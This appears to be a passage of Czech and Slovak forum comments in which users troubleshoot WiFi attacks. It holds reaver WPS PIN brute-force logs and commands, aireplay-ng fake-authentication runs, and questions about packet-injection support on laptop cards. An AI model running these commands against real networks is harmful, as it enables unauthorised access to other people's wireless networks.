[+] Received M1 message
[+] Sending M2 message
[+] Received M3 message
[+] Sending M4 message
[+] Received M5 message
[+] Sending M6 message
[+] Received WSC NACK
[+] Sending WSC NACK
[+] Trying pin 12349982
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[+] Received M1 message
[+] Sending M2 message
[+] Received M3 message
[+] Sending M4 message
[+] Received M5 message
[+] Sending M6 message
[+] Received WSC NACK
[+] Sending WSC NACK
[+] 99.99% complete @ 2014-03-30 09:08:44 (1 seconds/pin)
[+] Max time remaining at this rate: 0:00:01 (1 pins left to try)
Mám ješte jednu otázku - co dělat se screen saver u Kali Linux? Když nechám běžet reaver po delší dobu tak se spustí automaticky screensaver a já se pak nemůžu zpátky dostat na plochu protože po mě vyžaduje heslo! Nic jsem nenastavoval.Děkuji předem za radu :-)
A co říkáš co píše Libor? Zkoušel jsem to třikrát a pořád to samé. Ten poslední pin nezjistil a zůstal na 99% zjistění kodu a pak pořád dokola se snažil zjistit ten poslední:
WPS transaction failed (code: 0x03), re-trying last pin
[+] 99.99% complete @ 2014-02-22 15:11:23 (1 seconds/pin)
[+] Max time remaining at this rate: 0:00:01 (1 pins left to try)
reaver -i mon0 -b 00:11:22:33:44:55 -v --ignore-locks --no-nacks
reaver -i mon0 -b 00:11:22:33:44:55 -v --ignore-locks --no-nacks
aireplay-ng mon0 -1 120 -a XX:XX:XX:XX:XX:XX -e xxxxxx
No source MAC (-h) specified. Using the device MAC (xx:xx:xx:xx:xx:xx)
17:45:15 Waiting for beacon frame (BSSID: xx:xx:xx:xx:xx:xx) on channel -1
17:45:15 Couldn't determine current channel for mon0, you should either force the operation with --ignore-negative-one or apply a kernel patch
potom som skusil toto:
aireplay-ng mon0 -1 120 -a xx:xx:xx:xx:xx:xx -e xxxxxx --ignore-negative-one
potom hodilo tento vypis:
No source MAC (-h) specified. Using the device MAC (xx:xx:xx:xx:xx:xx)
17:45:53 Waiting for beacon frame (BSSID: xx:xx:xx:xx:xx:xx) on channel -1
17:45:53 Sending Authentication Request (Open System) [ACK]
17:45:53 Authentication successful
17:45:53 Sending Association Request [ACK]
17:45:53 Got a deauthentication packet! (Waiting 3 seconds)
17:45:56 Sending Authentication Request (Open System) [ACK]
17:45:56 Authentication successful
17:45:56 Sending Association Request [ACK]
17:45:56 Got a deauthentication packet! (Waiting 5 seconds)
17:46:01 Sending Authentication Request (Open System) [ACK]
17:46:01 Authentication successful
17:46:01 Sending Association Request [ACK]
17:46:01 Got a deauthentication packet! (Waiting 7 seconds)
17:46:08 Sending Authentication Request (Open System) [ACK]
17:46:08 Authentication successful
17:46:08 Sending Association Request [ACK]
17:46:08 Got a deauthentication packet! (Waiting 9 seconds)
17:46:17 Sending Authentication Request (Open System) [ACK]
17:46:17 Authentication successful
17:46:17 Sending Association Request [ACK]
17:46:17 Got a deauthentication packet! (Waiting 11 seconds)
takže TO fičí ? diky
lenže moj problém spočíva vtom že xiaopan nevidí moju wifi kartu v notebooku takže to neviem otestovat mohol by mi niekto poradit?Vopred Dakujem za pomoc.
P.S bude Aircrack fungovat na kartach do notebooku:
1. Intel wireless pro 2200BG (Ta je napsana že ano ale údaj packet injection se mění někde ano a někde ne).
2.Atheros AR5BMB5 miniPCI (O té jsem nic nenašel)
Děkuji Roman K.
P.S 2 mrpear-e članek je vynikajicí děkuji za něj moc.